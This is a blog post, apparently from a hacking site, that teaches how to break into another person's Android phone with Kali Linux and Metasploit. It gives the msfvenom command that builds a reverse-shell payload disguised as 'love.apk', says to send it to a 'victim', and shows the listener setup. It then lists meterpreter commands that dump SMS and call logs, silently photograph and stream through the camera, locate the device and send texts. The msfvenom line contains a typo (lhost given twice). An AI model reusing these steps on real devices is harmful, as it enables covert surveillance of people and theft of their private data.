HACKING

Hacking Is Fun. Use Hacking Only For Legal Purpose.

Latest Posts

Sunday, November 11, 2018

How To Hack Mobile Phone Using Kali Linux.

How To Hack Mobile Phone Using Kali Linux

Hello Friends! Today we learn How to Hack Mobile Phone Using Kali Linux. So, In this tutorial, we learn how to hack android phone using Kali Linux and find the location of the victim’s mobile phone, find SMS, find call logs and much more. before starting this tutorial let learn about how a mobile phone hacked via kali.
So, here we are going to create a payload using kali terminal and we send that payload to the victim’s mobile phone. After the installation of that app in victim’s mobile, the app sends us all the data of the victim’s mobile phone. This is the main trick to hack any android phone.

Metasploit

From Wikipedia,, The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source  Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and related research. The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Let’s Hack Begins, Open your terminal and type
ifconfig
to find your IP address. and then it will show the IP address of your device.

it shows IP address
After this type
msfvenom -p android/meterpreter/reverse_tcp lhost=’IP address’ lhost=4444 > /root/Desktop/love.apk
and hit enter.
How To Hack Android Phone Using Kali Linux
It will create a payload which steals credential from the victim’s mobile phone. This will help us to hack a mobile phone.
Here, we use msfvenom which is used to create a malicious app then I used -p which means we generate a payload then I give a command to generate a payload for Android and then I simply give the IP and port no. too and then I give the location where I wanted to save that apk.


Simply, send this love.apk file to victim’s mobile and install it. Open your terminal and type
msfconsole
This will open your Metasploit.
hack any android phone
and configure some settings before exploit.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
hack any android phone
Here, you can see on my screen that my meterpreter session is started and you are on the victim’s mobile phone.
I show you some command via implementing them.
Type
sysinfo
It will show the information about the device.
mobile is hacked
Type
check_root
It is the command to check the device is rooted or not.
check root
Type
dump_calllog
It will dump all the call history of the device.
get calllog
shows calllog
Type
dump_sms
It will dump all the SMS of the device.


dump sms
Type
webcam_list
It will show the list of the webcams on the device and when you type
webcam_snap 1
It will take a snap silently by the second camera.
webcam snap
snap from camera
Type
send_sms -d 70******17 -t U r gonna Hacked
This will send a message to the same no. by same no. that u r gonna hacked.
Type
wlan_geolocate
It will show the exact location of the victim’s device on Google map.

get location of hack device
type
webcam_stream
It starts live streaming by open your browser.
webcam stream of hack device
get full stream of victim camera
If you have any query regarding this tutorial then you can do comment it below. We will definitely do answer it. ðŸ™‚

No comments:

Post a Comment